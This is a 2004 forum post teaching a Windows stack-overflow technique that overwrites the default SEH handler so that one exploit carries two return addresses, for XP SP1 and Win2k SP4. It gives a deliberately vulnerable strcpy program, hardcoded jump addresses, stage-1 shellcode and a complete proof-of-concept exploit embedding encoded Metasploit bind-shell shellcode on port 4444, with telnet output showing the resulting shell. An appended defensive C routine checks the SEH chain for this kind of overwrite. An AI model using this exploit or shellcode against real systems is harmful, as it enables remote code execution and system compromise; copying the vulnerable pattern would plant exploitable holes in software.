Exploiting Default Exception Handler to Increase Exploit Sta

Posted by 韩冰 on 2004-11-19 10:39 (#1)
The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every Windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address, but in this case we will continue overwriting the stack and overwrite the default exception handler as well.

[Buf] <- Shellcode
[Return Address] <- jmp register (for Windows XP sp1)
[Various Stack Data] <- Junk
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
[SE Handler] <- jmp register (for Win2k sp4)
[Stage1 Shellcode] <- stage1 shellcode for win2k

If the first return address (Windows XP SP1) is wrong, an exception will occur and the default exception handler will be called (Windows 2000 SP4), thus allowing us to create a stable exploit with two return addresses.

Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm
- Sac

Vulnerable Code:
//lamebuf.c
#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char *argv[]){

    char buf[512];
    char buf1[1024]; // <- simulate a stack
    //DebugBreak();
    if (argc != 2){ return -1; }

    strcpy(buf, argv[1]); // unbounded copy of argv[1] into the 512-byte buffer
    return 0x0;
}

Getting Started:
Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:

EAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
EDI 77F59037 ntdll.77F59037
EIP 41414141

Let's take a look at the stack and see what happened to the default exception handler:
0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler

We successfully overwrote the return address and the default exception handler.

Primary Return Address (Windows XP SP1 EN):
The first return address will be called as in a normal stack overflow. We can see that esp points to user input; we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"

Secondary Return Address (Windows 2000 SP4 EN):
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"

Proof Of Concept:
// exploit.c
// Tal zeltzer - [Double Return] //

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <process.h> // execve()

#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

// Stage1 For WinXP Sp1 English
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 For Win2k Sp4 English
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";


int main(int argc, char *argv[]){

    char *bufExe[3];
    char buf[2048];
    bufExe[0] = "lamebuf.exe";
    bufExe[2] = NULL;

    memset(buf, 0x0, sizeof(buf));
    memset(buf, 0x90, 1652);
    memcpy(&buf[24], shellcode, sizeof(shellcode)-1);

    memcpy(&buf[1544], stage1_1, sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode (primary)
    memcpy(&buf[1592], stage1_2, sizeof(stage1_2)-1); //Win2k SP4 En - Stage1 Shellcode (secondary)

    *(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en
    *(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
    *(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en

    bufExe[1] = buf;
    //Execute the vulnerable application
    execve(bufExe[0], bufExe, NULL);

    return 0x0;
}

Exploit under Windows XP SP1:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Exploit under Windows 2000 SP4:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
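The mitigation side of the technique above, as an added example that is not part of the original post: a SEHOP-style walk of the SEH chain over a constructed fake stack, which rejects the overwritten final record (both fields 0x41414141) seen in the crash dump because a record's next pointer and handler no longer form a valid chain ending in the default handler. The stack range, the inner-frame record and the handler addresses are assumptions.

```c
#include <stdint.h>
#include <string.h>
/* Added example, not from the post: a SEHOP-style sanity walk over a
   simulated x86 SEH chain. Stack range and handler addresses are constructed. */
typedef struct {       /* models EXCEPTION_REGISTRATION_RECORD */
    uint32_t next;     /* next record; 0xFFFFFFFF terminates the chain */
    uint32_t handler;  /* handler code address */
} seh_record_t;
#define STACK_BASE 0x0012F000u   /* assumed bottom of the fake stack */
#define STACK_SIZE 0x00001000u
#define SEH_END    0xFFFFFFFFu
static uint8_t fake_stack[STACK_SIZE];   /* constructed stand-in for the stack */

static int on_stack(uint32_t a) { return a >= STACK_BASE && a < STACK_BASE + STACK_SIZE; }
static int read_record(uint32_t addr, seh_record_t *out) {
    if (!on_stack(addr) || !on_stack(addr + 7)) return 0;
    memcpy(out, fake_stack + (addr - STACK_BASE), sizeof *out);
    return 1;
}

static void write_record(uint32_t addr, uint32_t next, uint32_t handler) {
    seh_record_t r = { next, handler };
    memcpy(fake_stack + (addr - STACK_BASE), &r, sizeof r);
}

/* Walk from the head (fs:[0]): records must be on the stack, 4-byte aligned
   and ascending, handlers must not be on the stack, and the walk must reach
   SEH_END. Returns 1 if intact, 0 if the chain has been overwritten. */
int seh_chain_is_sane(uint32_t head) {
    uint32_t cur = head, prev = 0;
    for (int hops = 0; cur != SEH_END; hops++) {
        seh_record_t r;
        if ((cur & 3) || !read_record(cur, &r)) return 0;
        if ((prev && cur <= prev) || on_stack(r.handler) || hops > 64) return 0;
        prev = cur;
        cur = r.next;
    }
    return 1;
}

/* Rebuild the post's final record at 0x0012FFB0 intact, or as it looks after
   the 1600-byte overflow (both fields 0x41414141), then check the chain. */
int check_chain(int overwritten) {
    memset(fake_stack, 0, sizeof fake_stack);
    write_record(0x0012FF40u, 0x0012FFB0u, 0x77E10000u);  /* assumed inner frame handler */
    if (overwritten) write_record(0x0012FFB0u, 0x41414141u, 0x41414141u);
    else             write_record(0x0012FFB0u, SEH_END, 0x77F40000u);  /* assumed default handler */
    return seh_chain_is_sane(0x0012FF40u);
}
```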